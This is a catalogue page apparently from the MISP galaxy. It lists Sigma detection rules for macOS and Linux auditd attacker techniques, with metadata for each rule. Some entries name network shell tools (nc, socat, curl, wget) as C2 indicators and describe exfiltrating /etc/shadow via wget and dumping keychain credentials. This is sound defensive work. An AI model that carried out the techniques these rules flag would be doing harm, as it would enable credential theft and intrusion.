Detects usage of base64 utility to decode arbitrary base64-encoded text

Internal MISP references

UUID 719c22d7-c11a-4f2c-93a6-2cfdd5412f68 which can be used as unique global reference for Decode Base64 Encoded Text -MacOs in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Daniil Yugoslavskiy, oscd.community
creation_date 2020/10/19
falsepositive ['Legitimate activities']
filename proc_creation_macos_base64_decode.yml
level low
logsource.category process_creation
logsource.product macos
tags ['attack.defense_evasion', 'attack.t1027']

Macos Remote System Discovery

Detects the enumeration of other remote systems.

Internal MISP references

UUID 10227522-8429-47e6-a301-f2b2d014e7ad which can be used as unique global reference for Macos Remote System Discovery in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Alejandro Ortuno, oscd.community
creation_date 2020/10/22
falsepositive ['Legitimate administration activities']
filename proc_creation_macos_remote_system_discovery.yml
level informational
logsource.category process_creation
logsource.product macos
tags ['attack.discovery', 'attack.t1018']

User Added To Admin Group Via DseditGroup

Detects attempts to create and/or add an account to the admin group, thus granting admin privileges.

Internal MISP references

UUID 5d0fdb62-f225-42fb-8402-3dfe64da468a which can be used as unique global reference for User Added To Admin Group Via DseditGroup in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Sohan G (D4rkCiph3r)
creation_date 2023/08/22
falsepositive ['Legitimate administration activities']
filename proc_creation_macos_dseditgroup_add_to_admin_group.yml
level medium
logsource.category process_creation
logsource.product macos
tags ['attack.initial_access', 'attack.privilege_escalation', 'attack.t1078.003']

Split A File Into Pieces

Detects use of the command "split" to split files into parts for possible transfer.

Internal MISP references

UUID 7f2bb9d5-6395-4de5-969c-70c11fbe6b12 which can be used as unique global reference for Split A File Into Pieces in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Igor Fits, Mikhail Larin, oscd.community
creation_date 2020/10/15
falsepositive ['Legitimate administrative activity']
filename proc_creation_macos_split_file_into_pieces.yml
level low
logsource.category process_creation
logsource.product macos
tags ['attack.exfiltration', 'attack.t1030']

Suspicious Installer Package Child Process

Detects the execution of suspicious child processes from a macOS installer package parent process. This includes osascript, JXA, curl and wget, amongst other interpreters.

Internal MISP references

UUID e0cfaecd-602d-41af-988d-f6ccebb2af26 which can be used as unique global reference for Suspicious Installer Package Child Process in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Sohan G (D4rkCiph3r)
creation_date 2023/02/18
falsepositive ['Legitimate software uses the scripts (preinstall, postinstall)']
filename proc_creation_macos_installer_susp_child_process.yml
level medium
logsource.category process_creation
logsource.product macos
tags ['attack.t1059', 'attack.t1059.007', 'attack.t1071', 'attack.t1071.001', 'attack.execution', 'attack.command_and_control']

GUI Input Capture - macOS

Detects attempts to use system dialog prompts to capture user credentials

Internal MISP references

UUID 60f1ce20-484e-41bd-85f4-ac4afec2c541 which can be used as unique global reference for GUI Input Capture - macOS in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author remotephone, oscd.community
creation_date 2020/10/13
falsepositive ['Legitimate administration tools and activities']
filename proc_creation_macos_gui_input_capture.yml
level low
logsource.category process_creation
logsource.product macos
tags ['attack.credential_access', 'attack.t1056.002']

User Added To Admin Group Via Sysadminctl

Detects attempts to create and add an account to the admin group via "sysadminctl"

Internal MISP references

UUID 652c098d-dc11-4ba6-8566-c20e89042f2b which can be used as unique global reference for User Added To Admin Group Via Sysadminctl in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Sohan G (D4rkCiph3r)
creation_date 2023/03/19
falsepositive ['Legitimate administration activities']
filename proc_creation_macos_sysadminctl_add_user_to_admin_group.yml
level medium
logsource.category process_creation
logsource.product macos
tags ['attack.initial_access', 'attack.privilege_escalation', 'attack.t1078.003']

Local System Accounts Discovery - MacOs

Detects enumeration of local system accounts on macOS

Internal MISP references

UUID ddf36b67-e872-4507-ab2e-46bda21b842c which can be used as unique global reference for Local System Accounts Discovery - MacOs in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Alejandro Ortuno, oscd.community
creation_date 2020/10/08
falsepositive ['Legitimate administration activities']
filename proc_creation_macos_local_account.yml
level low
logsource.category process_creation
logsource.product macos
tags ['attack.discovery', 'attack.t1087.001']

Potential WizardUpdate Malware Infection

Detects the execution traces of the WizardUpdate malware. WizardUpdate is a macOS trojan that attempts to infiltrate macOS machines to steal data, and it is associated with other types of malicious payloads, increasing the chances of multiple infections on a device.

Internal MISP references

UUID f68c4a4f-19ef-4817-952c-50dce331f4b0 which can be used as unique global reference for Potential WizardUpdate Malware Infection in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Tim Rauch (rule), Elastic (idea)
creation_date 2022/10/17
falsepositive ['Unknown']
filename proc_creation_macos_wizardupdate_malware_infection.yml
level high
logsource.category process_creation
logsource.product macos
tags ['attack.command_and_control']

Indicator Removal on Host - Clear Mac System Logs

Detects deletion of local audit logs

Internal MISP references

UUID acf61bd8-d814-4272-81f0-a7a269aa69aa which can be used as unique global reference for Indicator Removal on Host - Clear Mac System Logs in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author remotephone, oscd.community
creation_date 2020/10/11
falsepositive ['Legitimate administration activities']
filename proc_creation_macos_clear_system_logs.yml
level medium
logsource.category process_creation
logsource.product macos
tags ['attack.defense_evasion', 'attack.t1070.002']

Remote Access Tool - Team Viewer Session Started On MacOS Host

Detects the command line executed when TeamViewer starts a session initiated by a remote host. Once a connection has been established, an investigator can verify the connection details by viewing the "incoming_connections.txt" log file in the TeamViewer folder.

Internal MISP references

UUID f459ccb4-9805-41ea-b5b2-55e279e2424a which can be used as unique global reference for Remote Access Tool - Team Viewer Session Started On MacOS Host in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Josh Nickels, Qi Nan
creation_date 2024/03/11
falsepositive ['Legitimate usage of TeamViewer']
filename proc_creation_macos_remote_access_tools_teamviewer_incoming_connection.yml
level low
logsource.category process_creation
logsource.product macos
tags ['attack.initial_access', 'attack.t1133']

System Shutdown/Reboot - MacOs

Adversaries may shut down or reboot systems to interrupt access to, or aid in the destruction of, those systems.

Internal MISP references

UUID 40b1fbe2-18ea-4ee7-be47-0294285811de which can be used as unique global reference for System Shutdown/Reboot - MacOs in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Igor Fits, Mikhail Larin, oscd.community
creation_date 2020/10/19
falsepositive ['Legitimate administrative activity']
filename proc_creation_macos_system_shutdown_reboot.yml
level informational
logsource.category process_creation
logsource.product macos
tags ['attack.impact', 'attack.t1529']

Disable Security Tools

Detects the disabling of security tools

Internal MISP references

UUID ff39f1a6-84ac-476f-a1af-37fcdf53d7c0 which can be used as unique global reference for Disable Security Tools in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Daniil Yugoslavskiy, oscd.community
creation_date 2020/10/19
falsepositive ['Legitimate activities']
filename proc_creation_macos_disable_security_tools.yml
level medium
logsource.category process_creation
logsource.product macos
tags ['attack.defense_evasion', 'attack.t1562.001']

Credentials from Password Stores - Keychain

Detects password dumps from the Keychain

Internal MISP references

UUID b120b587-a4c2-4b94-875d-99c9807d6955 which can be used as unique global reference for Credentials from Password Stores - Keychain in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Tim Ismilyaev, oscd.community, Florian Roth (Nextron Systems)
creation_date 2020/10/19
falsepositive ['Legitimate administration activities']
filename proc_creation_macos_creds_from_keychain.yml
level medium
logsource.category process_creation
logsource.product macos
tags ['attack.credential_access', 'attack.t1555.001']

JAMF MDM Execution

Detects execution of the "jamf" binary to create user accounts and run commands. For example, the binary can be abused by attackers on the system in order to bypass security controls or remove application control policies.

Internal MISP references

UUID be2e3a5c-9cc7-4d02-842a-68e9cb26ec49 which can be used as unique global reference for JAMF MDM Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Jay Pandit
creation_date 2023/08/22
falsepositive ['Legitimate use of the JAMF CLI tool by IT support and administrators']
filename proc_creation_macos_jamf_usage.yml
level low
logsource.category process_creation
logsource.product macos
tags ['attack.execution']

Network Sniffing - MacOs

Detects the usage of tooling to sniff network traffic. An adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data.

Internal MISP references

UUID adc9bcc4-c39c-4f6b-a711-1884017bf043 which can be used as unique global reference for Network Sniffing - MacOs in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Alejandro Ortuno, oscd.community
creation_date 2020/10/14
falsepositive ['Legitimate administration activities']
filename proc_creation_macos_network_sniffing.yml
level informational
logsource.category process_creation
logsource.product macos
tags ['attack.discovery', 'attack.credential_access', 'attack.t1040']

Default Credentials Usage

Before deploying any new asset, change all default passwords to values consistent with administrative-level accounts. This Sigma rule detects default credentials usage. Sigma rule for the Qualys vulnerability scanner; scan type: Vulnerability Management.

Internal MISP references

UUID 1a395cbc-a84a-463a-9086-ed8a70e573c7 which can be used as unique global reference for Default Credentials Usage in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Alexandr Yampolskyi, SOC Prime
creation_date 2019/03/26
falsepositive ['Unknown']
filename default_credentials_usage.yml
level medium
logsource.category No established category
logsource.product qualys
tags ['attack.initial_access']

Host Without Firewall

Host without firewall. An alert means the host is not compliant. Sigma rule for the Qualys vulnerability scanner; scan type: Vulnerability Management.

Internal MISP references

UUID 6b2066c8-3dc7-4db7-9db0-6cc1d7b0dde9 which can be used as unique global reference for Host Without Firewall in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Alexandr Yampolskyi, SOC Prime
creation_date 2019/03/19
falsepositive No established falsepositives
filename host_without_firewall.yml
level low
logsource.category No established category
logsource.product qualys
tags No established tags

Cleartext Protocol Usage Via Netflow

Ensure that all account usernames and authentication credentials are transmitted across networks using encrypted channels. Ensure that encryption is used for all sensitive information in transit. Ensure that an encrypted channel is used for all administrative account access.

Internal MISP references

UUID 7e4bfe58-4a47-4709-828d-d86c78b7cc1f which can be used as unique global reference for Cleartext Protocol Usage Via Netflow in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Alexandr Yampolskyi, SOC Prime
creation_date 2019/03/26
falsepositive ['Unknown']
filename netflow_cleartext_protocols.yml
level low
logsource.category No established category
logsource.product No established product
tags ['attack.credential_access']

OMIGOD SCX RunAsProvider ExecuteShellCommand - Auditd

Rule to detect the use of the SCX RunAsProvider Invoke_ExecuteShellCommand to execute any UNIX/Linux command using the /bin/sh shell. SCXcore, which started as the Microsoft Operations Manager UNIX/Linux Agent, is now used in a host of products including Microsoft Operations Manager, Microsoft Azure, and Microsoft Operations Management Suite.

Internal MISP references

UUID 045b5f9c-49f7-4419-a236-9854fb3c827a which can be used as unique global reference for OMIGOD SCX RunAsProvider ExecuteShellCommand - Auditd in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
creation_date 2021/09/17
falsepositive ['Legitimate use of SCX RunAsProvider Invoke_ExecuteShellCommand.']
filename lnx_auditd_omigod_scx_runasprovider_executeshellcommand.yml
level high
logsource.category No established category
logsource.product linux
tags ['attack.privilege_escalation', 'attack.initial_access', 'attack.execution', 'attack.t1068', 'attack.t1190', 'attack.t1203']

Use Of Hidden Paths Or Files

Detects calls to hidden files or files located in hidden directories on *nix systems.

Internal MISP references

UUID 9e1bef8d-0fff-46f6-8465-9aa54e128c1e which can be used as unique global reference for Use Of Hidden Paths Or Files in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author David Burkett, @signalblur
creation_date 2022/12/30
falsepositive ['Unknown']
filename lnx_auditd_hidden_binary_execution.yml
level low
logsource.category No established category
logsource.product linux
tags ['attack.defense_evasion', 'attack.t1574.001']

File or Folder Permissions Change

Detects file and folder permission changes.

Internal MISP references

UUID 74c01ace-0152-4094-8ae2-6fd776dd43e5 which can be used as unique global reference for File or Folder Permissions Change in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Jakob Weinzettl, oscd.community
creation_date 2019/09/23
falsepositive ['User interacting with files permissions (normal/daily behaviour).']
filename lnx_auditd_file_or_folder_permissions.yml
level low
logsource.category No established category
logsource.product linux
tags ['attack.defense_evasion', 'attack.t1222.002']

Logging Configuration Changes on Linux Host

Detects changes to syslog daemon configuration files

Internal MISP references

UUID c830f15d-6f6e-430f-8074-6f73d6807841 which can be used as unique global reference for Logging Configuration Changes on Linux Host in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Mikhail Larin, oscd.community
creation_date 2019/10/25
falsepositive ['Legitimate administrative activity']
filename lnx_auditd_logging_config_change.yml
level high
logsource.category No established category
logsource.product linux
tags ['attack.defense_evasion', 'attack.t1562.006']

Systemd Service Creation

Detects the creation of systemd services, which could be used by adversaries to execute malicious code.

Internal MISP references

UUID 1bac86ba-41aa-4f62-9d6b-405eac99b485 which can be used as unique global reference for Systemd Service Creation in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Pawel Mazur
creation_date 2022/02/03
falsepositive ['Admin work like legit service installs.']
filename lnx_auditd_systemd_service_creation.yml
level medium
logsource.category No established category
logsource.product linux
tags ['attack.persistence', 'attack.t1543.002']

BPFDoor Abnormal Process ID or Lock File Accessed

Detects access to BPFDoor .lock and .pid files in the temporary file storage directory

Internal MISP references

UUID 808146b2-9332-4d78-9416-d7e47012d83d which can be used as unique global reference for BPFDoor Abnormal Process ID or Lock File Accessed in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Rafal Piasecki
creation_date 2022/08/10
falsepositive ['Unlikely']
filename lnx_auditd_bpfdoor_file_accessed.yml
level high
logsource.category No established category
logsource.product linux
tags ['attack.execution', 'attack.t1106', 'attack.t1059']

Audio Capture

Detects attempts to record audio with the arecord utility

Internal MISP references

UUID a7af2487-9c2f-42e4-9bb9-ff961f0561d5 which can be used as unique global reference for Audio Capture in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Pawel Mazur
creation_date 2021/09/04
falsepositive ['Unknown']
filename lnx_auditd_audio_capture.yml
level low
logsource.category No established category
logsource.product linux
tags ['attack.collection', 'attack.t1123']

Credentials In Files - Linux

Detects attempts to extract passwords with grep

Internal MISP references

UUID df3fcaea-2715-4214-99c5-0056ea59eb35 which can be used as unique global reference for Credentials In Files - Linux in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Igor Fits, oscd.community
creation_date 2020/10/15
falsepositive ['Unknown']
filename lnx_auditd_find_cred_in_files.yml
level high
logsource.category No established category
logsource.product linux
tags ['attack.credential_access', 'attack.t1552.001']

Binary Padding - Linux

Adversaries may use binary padding to add junk data and change the on-disk representation of malware. This rule detects the use of dd and truncate to add junk data to a file.

Internal MISP references

UUID c52a914f-3d8b-4b2a-bb75-b3991e75f8ba which can be used as unique global reference for Binary Padding - Linux in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Igor Fits, oscd.community
creation_date 2020/10/13
falsepositive ['Unknown']
filename lnx_auditd_binary_padding.yml
level high
logsource.category No established category
logsource.product linux
tags ['attack.defense_evasion', 'attack.t1027.001']

Steganography Hide Files with Steghide

Detects embedding of files using the steghide binary; adversaries may use this technique to prevent the detection of hidden information.

Internal MISP references

UUID ce446a9e-30b9-4483-8e38-d2c9ad0a2280 which can be used as unique global reference for Steganography Hide Files with Steghide in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Pawel Mazur
creation_date 2021/09/11
falsepositive ['Unknown']
filename lnx_auditd_steghide_embed_steganography.yml
level low
logsource.category No established category
logsource.product linux
tags ['attack.defense_evasion', 'attack.t1027.003']

System Owner or User Discovery

Adversaries may use the information from System Owner/User Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.

Internal MISP references

UUID 9a0d8ca0-2385-4020-b6c6-cb6153ca56f3 which can be used as unique global reference for System Owner or User Discovery in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Timur Zinniatullin, oscd.community
creation_date 2019/10/21
falsepositive ['Admin activity']
filename lnx_auditd_user_discovery.yml
level low
logsource.category No established category
logsource.product linux
tags ['attack.discovery', 'attack.t1033']

Suspicious C2 Activities

Detects suspicious activities as declared by Florian Roth in his 'Best Practice Auditd Configuration'. This includes the detection of the following commands: wget, curl, base64, nc, netcat, ncat, ssh, socat, wireshark, rawshark, rdesktop, nmap. These commands match a few techniques from the "Command and Control" tactic, including, non-exhaustively, the following: Application Layer Protocol (T1071), Non-Application Layer Protocol (T1095), Data Encoding (T1132)

Internal MISP references

UUID f7158a64-6204-4d6d-868a-6e6378b467e0 which can be used as unique global reference for Suspicious C2 Activities in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Marie Euler
creation_date 2020/05/18
falsepositive ['Admin or User activity']
filename lnx_auditd_susp_c2_commands.yml
level medium
logsource.category No established category
logsource.product linux
tags ['attack.command_and_control']

Clipboard Collection with Xclip Tool - Auditd

Detects attempts to collect data stored in users' clipboards using the xclip tool. xclip has to be installed. Using this rule on servers is highly recommended, since clipboard utilities are heavily used on user workstations.

Internal MISP references

UUID 214e7e6c-f21b-47ff-bb6f-551b2d143fcf which can be used as unique global reference for Clipboard Collection with Xclip Tool - Auditd in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Pawel Mazur
creation_date 2021/09/24
falsepositive ['Legitimate usage of xclip tools']
filename lnx_auditd_clipboard_collection.yml
level low
logsource.category No established category
logsource.product linux
tags ['attack.collection', 'attack.t1115']

Steganography Extract Files with Steghide

Detects extraction of files using the steghide binary; adversaries may use this technique to prevent the detection of hidden information.

Internal MISP references

UUID a5a827d9-1bbe-4952-9293-c59d897eb41b which can be used as unique global reference for Steganography Extract Files with Steghide in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Pawel Mazur
creation_date 2021/09/11
falsepositive ['Unknown']
filename lnx_auditd_steghide_extract_steganography.yml
level low
logsource.category No established category
logsource.product linux
tags ['attack.defense_evasion', 'attack.t1027.003']

Loading of Kernel Module via Insmod

Detects loading of kernel modules with the insmod command. Loadable Kernel Modules (LKMs) are pieces of code that can be loaded into and unloaded from the kernel on demand. Adversaries may use LKMs to obtain persistence within the system or to elevate privileges.

Internal MISP references

UUID 106d7cbd-80ff-4985-b682-a7043e5acb72 which can be used as unique global reference for Loading of Kernel Module via Insmod in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Pawel Mazur
creation_date 2021/11/02
falsepositive ['Unknown']
filename lnx_auditd_load_module_insmod.yml
level high
logsource.category No established category
logsource.product linux
tags ['attack.persistence', 'attack.privilege_escalation', 'attack.t1547.006']

Webshell Remote Command Execution

Detects possible command execution by web application/web shell

Internal MISP references

UUID c0d3734d-330f-4a03-aae2-65dacc6a8222 which can be used as unique global reference for Webshell Remote Command Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Ilyas Ochkov, Beyu Denis, oscd.community
creation_date 2019/10/12
falsepositive ['Admin activity', 'Crazy web applications']
filename lnx_auditd_web_rce.yml
level critical
logsource.category No established category
logsource.product linux
tags ['attack.persistence', 'attack.t1505.003']

Unix Shell Configuration Modification

Detects Unix shell configuration modification. Adversaries may establish persistence by executing malicious commands triggered when a new shell is opened.

Internal MISP references

UUID a94cdd87-6c54-4678-a6cc-2814ffe5a13d which can be used as unique global reference for Unix Shell Configuration Modification in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Peter Matkovski, IAI
creation_date 2023/03/06
falsepositive ['Admin or User activity are expected to generate some false positives']
filename lnx_auditd_unix_shell_configuration_modification.yml
level medium
logsource.category No established category
logsource.product linux
tags ['attack.persistence', 'attack.t1546.004']

Screen Capture with Import Tool

Detects an adversary creating a screen capture of a desktop with the Import tool. Using this rule on servers is highly recommended, since screenshot utilities are heavily used on user workstations. ImageMagick must be installed.

Internal MISP references

UUID dbe4b9c5-c254-4258-9688-d6af0b7967fd which can be used as unique global reference for Screen Capture with Import Tool in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Pawel Mazur
creation_date 2021/09/21
falsepositive ['Legitimate use of screenshot utility']
filename lnx_auditd_screencapture_import.yml
level low
logsource.category No established category
logsource.product linux
tags ['attack.collection', 'attack.t1113']

Disable System Firewall

Detects disabling of system firewalls which could be used by adversaries to bypass controls that limit usage of the network.

Internal MISP references

UUID 53059bc0-1472-438b-956a-7508a94a91f0 which can be used as unique global reference for Disable System Firewall in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Pawel Mazur
creation_date 2022/01/22
falsepositive ['Admin activity']
filename lnx_auditd_disable_system_firewall.yml
level high
logsource.category No established category
logsource.product linux
tags ['attack.t1562.004', 'attack.defense_evasion']

Steganography Unzip Hidden Information From Picture File

Detects extraction of a zip file from an image file

Internal MISP references

UUID edd595d7-7895-4fa7-acb3-85a18a8772ca which can be used as unique global reference for Steganography Unzip Hidden Information From Picture File in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Pawel Mazur
creation_date 2021/09/09
falsepositive ['Unknown']
filename lnx_auditd_unzip_hidden_zip_files_steganography.yml
level low
logsource.category No established category
logsource.product linux
tags ['attack.defense_evasion', 'attack.t1027.003']

Linux Capabilities Discovery

Detects attempts to discover files with the setuid/setgid capability set on them, which would allow an adversary to escalate their privileges.

Internal MISP references

UUID fe10751f-1995-40a5-aaa2-c97ccb4123fe which can be used as unique global reference for Linux Capabilities Discovery in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Pawel Mazur
creation_date 2021/11/28
falsepositive ['Unknown']
filename lnx_auditd_capabilities_discovery.yml
level low
logsource.category No established category
logsource.product linux
tags ['attack.collection', 'attack.privilege_escalation', 'attack.t1123', 'attack.t1548']

System and Hardware Information Discovery

Detects system information discovery commands

Internal MISP references

UUID 1f358e2e-cb63-43c3-b575-dfb072a6814f which can be used as unique global reference for System and Hardware Information Discovery in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Ömer Günal, oscd.community
creation_date 2020/10/08
falsepositive ['Legitimate administration activities']
filename lnx_auditd_system_info_discovery2.yml
level informational
logsource.category No established category
logsource.product linux
tags ['attack.discovery', 'attack.t1082']

Modify System Firewall

Detects the removal of system firewall rules. Adversaries may only delete or modify a specific system firewall rule to bypass controls limiting network usage or access. Detection rules that match only on the disabling of firewalls will miss this.

Internal MISP references

UUID 323ff3f5-0013-4847-bbd4-250b5edb62cc which can be used as unique global reference for Modify System Firewall in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author IAI
creation_date 2023/03/06
falsepositive ['Legitimate admin activity']
filename lnx_auditd_modify_system_firewall.yml
level medium
logsource.category No established category
logsource.product linux
tags ['attack.t1562.004', 'attack.defense_evasion']

Auditing Configuration Changes on Linux Host

Detects changes to auditd configuration files

Internal MISP references

UUID 977ef627-4539-4875-adf4-ed8f780c4922 which can be used as unique global reference for Auditing Configuration Changes on Linux Host in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Mikhail Larin, oscd.community
creation_date 2019/10/25
falsepositive ['Legitimate administrative activity']
filename lnx_auditd_auditing_config_change.yml
level high
logsource.category No established category
logsource.product linux
tags ['attack.defense_evasion', 'attack.t1562.006']

Modification of ld.so.preload

Identifies modification of ld.so.preload for shared object injection. This technique is used by attackers to load arbitrary code into processes.

Internal MISP references

UUID 4b3cb710-5e83-4715-8c45-8b2b5b3e5751 which can be used as unique global reference for Modification of ld.so.preload in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author E.M. Anhaus (originally from Atomic Blue Detections, Tony Lambert), oscd.community
creation_date 2019/10/24
falsepositive ['Unknown']
filename lnx_auditd_ld_so_preload_mod.yml
level high
logsource.category No established category
logsource.product linux
tags ['attack.defense_evasion', 'attack.t1574.006']

Masquerading as Linux Crond Process

Masquerading occurs when the name or location of an executable, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. Several different variations of this technique have been observed.

Internal MISP references

UUID 9d4548fa-bba0-4e88-bd66-5d5bf516cda0 which can be used as unique global reference for Masquerading as Linux Crond Process in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Timur Zinniatullin, oscd.community
creation_date 2019/10/21
falsepositive No established falsepositives
filename lnx_auditd_masquerading_crond.yml
level medium
logsource.category No established category
logsource.product linux
tags ['attack.defense_evasion', 'attack.t1036.003']

Steganography Hide Zip Information in Picture File

Detects appending of a zip file to an image

Internal MISP references

UUID 45810b50-7edc-42ca-813b-bdac02fb946b which can be used as unique global reference for Steganography Hide Zip Information in Picture File in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Pawel Mazur
creation_date 2021/09/09
falsepositive ['Unknown']
filename lnx_auditd_hidden_zip_files_steganography.yml
level low
logsource.category No established category
logsource.product linux
tags ['attack.defense_evasion', 'attack.t1027.003']

Suspicious History File Operations - Linux

Detects command-line operations on shell history files

Internal MISP references

UUID eae8ce9f-bde9-47a6-8e79-f20d18419910 which can be used as unique global reference for Suspicious History File Operations - Linux in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Mikhail Larin, oscd.community
creation_date 2020/10/17
falsepositive ['Legitimate administrative activity', 'Legitimate software, cleaning hist file']
filename lnx_auditd_susp_histfile_operations.yml
level medium
logsource.category No established category
logsource.product linux
tags ['attack.credential_access', 'attack.t1552.003']

File Time Attribute Change - Linux

Detects file time attribute changes used to hide new files or changes to existing files.

Internal MISP references

UUID b3cec4e7-6901-4b0d-a02d-8ab2d8eb818b which can be used as unique global reference for File Time Attribute Change - Linux in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Igor Fits, oscd.community
creation_date 2020/10/15
falsepositive ['Unknown']
filename lnx_auditd_change_file_time_attr.yml
level medium
logsource.category No established category
logsource.product linux
tags ['attack.defense_evasion', 'attack.t1070.006']

Possible Coin Miner CPU Priority Param

Detects a command-line parameter very often used with coin miners

Internal MISP references

UUID 071d5e5a-9cef-47ec-bc4e-a42e34d8d0ed which can be used as unique global reference for Possible Coin Miner CPU Priority Param in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2021/10/09
falsepositive ['Other tools that use a --cpu-priority flag']
filename lnx_auditd_coinminer.yml
level critical
logsource.category No established category
logsource.product linux
tags ['attack.privilege_escalation', 'attack.t1068']

Network Sniffing - Linux

Network sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection. An adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use SPAN ports to capture a larger amount of data.

Internal MISP references

UUID f4d3748a-65d1-4806-bd23-e25728081d01 which can be used as unique global reference for Network Sniffing - Linux in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Timur Zinniatullin, oscd.community
creation_date 2019/10/21
falsepositive ['Legitimate administrator or user uses network sniffing tool for legitimate reasons.']
filename lnx_auditd_network_sniffing.yml
level low
logsource.category No established category
logsource.product linux
tags ['attack.credential_access', 'attack.discovery', 'attack.t1040']
Related clusters

To see the related clusters, click here.

Data Exfiltration with Wget

Detects attempts to post a file with the wget utility (e.g. via --post-file). A misconfigured sudo permission for wget lets an adversary bypass file permission restrictions and read and exfiltrate files such as /etc/shadow.

Internal MISP references

UUID cb39d16b-b3b6-4a7a-8222-1cf24b686ffc which can be used as unique global reference for Data Exfiltration with Wget in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Pawel Mazur
creation_date 2021/11/18
falsepositive ['Legitimate usage of wget utility to post a file']
filename lnx_auditd_data_exfil_wget.yml
level medium
logsource.category No established category
logsource.product linux
tags ['attack.exfiltration', 'attack.t1048.003']
Related clusters

To see the related clusters, click here.

Systemd Service Reload or Start

Detects a reload or start of a systemd service.

Internal MISP references

UUID 2625cc59-0634-40d0-821e-cb67382a3dd7 which can be used as unique global reference for Systemd Service Reload or Start in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Jakob Weinzettl, oscd.community
creation_date 2019/09/23
falsepositive ['Installation of legitimate service.', 'Legitimate reconfiguration of service.']
filename lnx_auditd_pers_systemd_reload.yml
level low
logsource.category No established category
logsource.product linux
tags ['attack.persistence', 'attack.t1543.002']
Related clusters

To see the related clusters, click here.

Split A File Into Pieces - Linux

Detects use of the "split" command to split files into parts, possibly in preparation for transfer.

Internal MISP references

UUID 2dad0cba-c62a-4a4f-949f-5f6ecd619769 which can be used as unique global reference for Split A File Into Pieces - Linux in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Igor Fits, oscd.community
creation_date 2020/10/15
falsepositive ['Legitimate administrative activity']
filename lnx_auditd_split_file_into_pieces.yml
level low
logsource.category No established category
logsource.product linux
tags ['attack.exfiltration', 'attack.t1030']
Related clusters

To see the related clusters, click here.

Clipboard Collection of Image Data with Xclip Tool

Detects attempts to collect image data stored in the clipboard of users with the xclip tool. xclip has to be installed. It is highly recommended to use this rule on servers, due to the high usage of clipboard utilities on user workstations.

Internal MISP references

UUID f200dc3f-b219-425d-a17e-c38467364816 which can be used as unique global reference for Clipboard Collection of Image Data with Xclip Tool in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Pawel Mazur
creation_date 2021/10/01
falsepositive ['Legitimate usage of xclip tools']
filename lnx_auditd_clipboard_image_collection.yml
level low
logsource.category No established category
logsource.product linux
tags ['attack.collection', 'attack.t1115']
Related clusters

